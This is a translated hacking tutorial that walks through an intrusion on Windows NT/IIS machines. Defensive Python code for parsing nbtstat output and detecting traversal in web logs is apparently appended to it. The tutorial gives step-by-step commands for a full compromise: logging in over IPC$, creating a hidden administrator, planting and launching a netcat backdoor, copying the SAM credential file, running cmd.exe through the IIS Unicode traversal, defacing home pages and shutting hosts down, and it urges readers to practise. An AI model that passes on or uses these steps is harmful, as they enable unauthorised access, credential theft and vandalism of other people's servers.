Common network commands

xiaoxiao 2021-03-05

1: NET
As long as you have an IP address, a user name and a password, you can connect with IPC$. Suppose the user you obtained is HBX with password 123456, and the other side's IP is 127.0.0.1:
net use \\127.0.0.1\IPC$ 123456 /user:HBX
The command to disconnect is:
net use \\127.0.0.1\IPC$ /delete
All of the following operations require that you are logged in this way.

Next we create a user, because SA's permissions are equivalent to the system's superuser. We add a user Heibai with password lovechina:
net user heibai lovechina /add
As long as the command succeeds, we can then add him to the Administrators group:
net localgroup administrators heibai /add
Here we map the other side's C drive locally (any other drive works, as long as it exists). This maps the other side's C drive to the local Z drive:
net use z: \\127.0.0.1\C$
This starts the other side's Telnet service:
net start telnet
Here we activate the Guest account. Guest is a default NT account and cannot be deleted? I am not sure; on my Windows 2000 it was deleted.
net user guest /active:yes
Here we change a user's password: we change Guest's password to lovechina, and the same works for other users, as long as you have the permission:
net user guest lovechina
The net command really is powerful!

2: AT
An intruder usually leaves a back door after getting in, that is, a Trojan. Once you have uploaded the Trojan, how do you start it? That is what the AT command is for. Here you have already logged in to that server. First you have to get the other side's time:
net time \\127.0.0.1
This returns a time; say it is 12:01. Now you create a job, ID = 1:
at \\127.0.0.1 12:03 nc.exe
This assumes the Trojan is named nc.exe and is already on the other side's server. A word about NC: NC is Netcat, and it is usually renamed for convenient typing. It acts as a Telnet service, here on port 99. Wait until 12:03 and you can connect to the other side's port 99. That hands the other side's machine to the Trojan.

3: TELNET
This command is very practical: it connects to a remote host, but you need a user name and password. Since you planted a Trojan on the other side, you connect directly to the Trojan's port:
telnet 127.0.0.1 99
This connects to the other side's port 99.
Then you can run commands on the other side's machine; this is what is called a "broiler" (a zombie host).

4: FTP
It transfers your files to the other side. You can apply for a space that supports FTP uploads; there are many in China. If you can't find one, I recommend www.51.net, it is not bad. When you apply, it gives you a user name, a password and an FTP server. You must log in before uploading. Suppose the FTP server is www.51.net, the user name is hucjs and the password is 654321:
ftp www.51.net
It will ask for the user name and then the password; after a successful login you can transfer files.

First, uploading. Suppose the file you want to upload is index.htm in your C:\ and you want to send it to the other side's D:\:
put c:\index.htm d:\
Suppose instead you want to download the other side's c:\index.htm to your machine's d:\:
get c:\index.htm d:\

5: COPY
Here I explain how to copy local files to the other side's hard disk; a valid IPC$ connection is required. Here we copy index.htm from the local C:\ to the C:\ of 127.0.0.1:
copy index.htm \\127.0.0.1\c$\index.htm
If you want to copy it to D:\, change c$ to d$:
copy index.htm \\127.0.0.1\d$\index.htm
If you want to copy it to the Winnt directory, enter:
copy index.htm \\127.0.0.1\admin$\index.htm
admin$ is the Winnt directory.
To copy the other side's files over: the backup of NT's SAM database is x:\winnt\repair\sam._ (sam._ is the file name of the backed-up SAM database). Copy it from 127.0.0.1 like this:
copy \\127.0.0.1\admin$\repair\sam._ c:\

6: SET
If you run into a machine and want to deface it (an idea that is only permissible at special times), its port 80 has to be open, otherwise nobody would see it. You need the set command! Below is the result I got; let me analyze it, the point is to find where the home page is.
COMPUTERNAME=PENTIUMII
ComSpec=D:\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=*/*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=(the current IP; what was shown here was originally my own IP, so I deleted it)
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
NUMBER_OF_PROCESSORS=1
Os2LibPath=D:\WINNT\system32\os2\dll;
OS=Windows_NT
Path=D:\Winnt\System32;D:\WinNT
PATHEXT=.com;.exe;.bat;.cmd
PATH_TRANSLATED=E:\VLROOT
This is where the home page is put; as soon as you see PATH_TRANSLATED= you have the storage location of the home page.

Here that is E:\vlroot.
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0303
PROMPT=$P$G
QUERY_STRING=/c set
REMOTE_ADDR=XX.XX.XX.XX
REMOTE_HOST=XX.XX.XX.XX
REQUEST_METHOD=GET
SCRIPT_NAME=/scripts/..%2f../winnt/system32/cmd.exe
SERVER_NAME=XX.XX.XX.XX
SERVER_PORT=80
SERVER_PORT_SECURE=0
SERVER_PROTOCOL=HTTP/1.1
SERVER_SOFTWARE=Microsoft-IIS/3.0 (so the other side runs IIS 3.0)
SystemDrive=D:
SystemRoot=D:\Winnt
TZ=GMT-9
USERPROFILE=D:\WinNT\Profiles\Default User
WINDIR=D:\Winnt
The line highlighted in pink (PATH_TRANSLATED) is the storage location of the other side's home page. Let me tell everyone a trick, a very stupid trick, but the only way I know to find the file name of the home page: when you dir that directory you will see many files. Enter each file name in the browser as XX.xx.xx.xx/filename; the one that looks the same as XX.xx.xx.xx is the home page.

7: NBTSTAT
If you scan an NT machine and one of its ports 136 to 139 is open, use this command to get the user name. By the way, this is NetBIOS. Once you have a user name you can guess the password, for example a simple password, "password", or the user name itself; try them all, you might get lucky. Nowadays many NT machines have these ports open, so you can practice. Let's analyze the result. The command is:
nbtstat -A xx.xx.xx.xx
The -A must be upper case. The result is below.

NetBIOS Remote Machine Name Table

     Name               Type         Status
  ---------------------------------------------
  PENTIUMII       <00>  UNIQUE      Registered
  PENTIUMII       <20>  UNIQUE      Registered
  ORAHOTOWN       <00>  GROUP       Registered
  ORAHOTOWN       <1C>  GROUP       Registered
  ORAHOTOWN       <1B>  UNIQUE      Registered
  PENTIUMII       <03>  UNIQUE      Registered
  INet~Services   <1C>  GROUP       Registered
  IS~PENTIUMII... <00>  UNIQUE      Registered
  ORAHOTOWN       <1E>  GROUP       Registered
  ORAHOTOWN       <1D>  UNIQUE      Registered
  ..__MSBROWSE__. <01>  GROUP       Registered

  MAC Address = 00-E0-29-14-35-BA

The entry highlighted in pink is the user logged in to this system. Maybe you don't know how to read it: everyone sees a number in angle brackets; as long as that number is <03>, the name in front of it is the user. The user here is Pentiumii.

8: SHUTDOWN
The shutdown command:
shutdown \\ip_address /t:20
After 20 seconds the NT machine shuts down. Don't run this command casually; it causes the other side a lot of losses. Be an intruder with a conscience.

9: DIR
This command isn't fancy, but it is very important. It lists all the files and folders in a directory. You can try it locally.

10: ECHO
The famous Unicode vulnerability: with this command you can easily deface a host that has this vulnerability. Suppose we want to write "The evidence of the Nanjing Massacre is as solid as a mountain; no Japanese may deny it!":
echo The evidence of the Nanjing Massacre is as solid as a mountain; no Japanese may deny it! > index.htm
echo The evidence of the Nanjing Massacre is as solid as a mountain; no Japanese may deny it! >> index.htm
The first command overwrites the original content of index.htm with that sentence. The second appends the sentence to the end of index.htm. ">>" appends to the file; ">" overwrites the original file content.
Everyone can try it locally.
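Section 7 explains how to read an nbtstat -A name table by hand. As an added example (not part of the original article), the following Python decodes such a table using the standard NetBIOS suffix assignments, so a defender can see exactly what a host advertises to an unauthenticated query: computer name, domain, file sharing, IIS, and any logged-on user (a <03> UNIQUE name that differs from the computer name). The sample table is the article's PENTIUMII / ORAHOTOWN output re-aligned into nbtstat's column layout.

```python
import re
# Standard NetBIOS name suffixes (16th byte) and the service each one advertises.
SUFFIX = {
    ("00", "UNIQUE"): "workstation service (computer name)",
    ("00", "GROUP"): "domain or workgroup name",
    ("03", "UNIQUE"): "messenger service (computer name or logged-on user)",
    ("20", "UNIQUE"): "server service (file shares offered)",
    ("1B", "UNIQUE"): "domain master browser (PDC)",
    ("1C", "GROUP"): "domain controllers",
    ("1D", "UNIQUE"): "subnet master browser",
    ("1E", "GROUP"): "browser elections",
    ("01", "GROUP"): "__MSBROWSE__ master browser announcement",
}
ROW = re.compile(r"^\s*(\S.*?)\s*<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+Registered", re.I)
def parse_name_table(text):
    """Return (name, suffix, type, meaning) for each registered name in nbtstat -A output."""
    rows = []
    for m in filter(None, map(ROW.match, text.splitlines())):
        name, suffix, ntype = m.group(1), m.group(2).upper(), m.group(3).upper()
        # INet~Services and IS~<host> are IIS registrations, not domain-controller names.
        iis = name.startswith(("INet~Services", "IS~"))
        meaning = "IIS registration" if iis else SUFFIX.get((suffix, ntype), "unknown suffix")
        rows.append((name, suffix, ntype, meaning))
    return rows

def exposure(rows):
    """What an unauthenticated name query (137/udp) learns about the host."""
    computer = {n for n, s, t, _ in rows if (s, t) == ("00", "UNIQUE") and not n.startswith("IS~")}
    return {
        "computer": computer,
        "domain": {n for n, s, t, _ in rows if (s, t) == ("00", "GROUP")},
        # A <03> UNIQUE name that differs from the computer name is a logged-on user.
        "logged_on_users": {n for n, s, t, _ in rows if (s, t) == ("03", "UNIQUE")} - computer,
        "file_sharing": any(s == "20" for _, s, _, _ in rows),
        "web_server": any(m == "IIS registration" for *_, m in rows),
    }
# Constructed sample: the article's PENTIUMII / ORAHOTOWN table, re-aligned into nbtstat's layout.
SAMPLE = """\
PENTIUMII       <00>  UNIQUE      Registered
PENTIUMII       <20>  UNIQUE      Registered
ORAHOTOWN       <00>  GROUP       Registered
ORAHOTOWN       <1C>  GROUP       Registered
ORAHOTOWN       <1B>  UNIQUE      Registered
PENTIUMII       <03>  UNIQUE      Registered
INet~Services   <1C>  GROUP       Registered
IS~PENTIUMII... <00>  UNIQUE      Registered
ORAHOTOWN       <1E>  GROUP       Registered
ORAHOTOWN       <1D>  UNIQUE      Registered
..__MSBROWSE__. <01>  GROUP       Registered
"""
```

Running exposure(parse_name_table(SAMPLE)) shows that in the article's table the <03> entry is the computer name itself, so no separate user session is exposed, while the <20>, <1B> and INet~Services entries reveal file sharing, a PDC role and IIS.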
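The SCRIPT_NAME in section 6 (/scripts/..%2f../winnt/system32/cmd.exe with QUERY_STRING /c set) is exactly the request shape the Unicode vulnerability of section 10 relies on: the server checked for ".." before decoding the %2f, so the traversal went unnoticed. As an added example (not part of the original article), this Python detector canonicalises URI stems the way a defender's log review should, decoding repeatedly to defeat double encoding, and flags such requests in constructed IIS-style log lines; the log format and client addresses are assumptions.

```python
import re
from urllib.parse import unquote
# Constructed IIS-style log lines (W3C fields: time c-ip cs-method cs-uri-stem cs-uri-query sc-status).
# The third line mirrors the SCRIPT_NAME / QUERY_STRING pair in the article's set output.
LOG = """\
12:01:05 10.0.0.5 GET /index.htm - 200
12:01:09 10.0.0.5 GET /images/logo.gif - 200
12:01:13 10.0.0.9 GET /scripts/..%2f../winnt/system32/cmd.exe /c+set 200
12:01:20 10.0.0.9 GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir 200
12:01:31 10.0.0.7 GET /docs/../index.htm - 200
"""

def canonical_path(stem):
    """Percent-decode until stable (defeats double encoding), unify slashes and resolve
    '.'/'..'. Returns (segments, depth); depth < 0 means the path climbed above the web root."""
    decoded, nxt = stem, unquote(stem)
    while nxt != decoded:
        decoded, nxt = nxt, unquote(nxt)
    segs, depth = [], 0
    for part in decoded.replace("\\", "/").split("/"):
        if part == ".." and segs:
            segs.pop()
        elif part == "..":
            depth -= 1
        elif part not in ("", "."):
            segs.append(part)
    return segs, depth

def check_request(stem):
    """Return the reasons a URI stem looks like a traversal / command-execution attempt."""
    reasons = []
    # IIS never needs an encoded slash, backslash or dot in a stem; %25 hides a second layer.
    if re.search(r"%(2f|5c|2e|25)", stem, re.I):
        reasons.append("encoded separator or dot in URI stem")
    segs, depth = canonical_path(stem)
    if depth < 0:
        reasons.append("path climbs above web root")
    if segs and segs[-1].lower() == "cmd.exe":
        reasons.append("targets cmd.exe")
    return reasons

def scan_log(text):
    """Return (time, client, stem, reasons) for every suspicious line in the log."""
    hits = []
    for line in text.splitlines():
        time, client, _method, stem, _query, _status = line.split()
        reasons = check_request(stem)
        if reasons:
            hits.append((time, client, stem, reasons))
    return hits
```

Note that /docs/../index.htm is not flagged: a ".." that stays inside the web root is legitimate, which is why the check is on the canonical depth rather than on the literal presence of "..".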

Please credit the original address when reposting: https://www.9cbs.com/read-33175.html
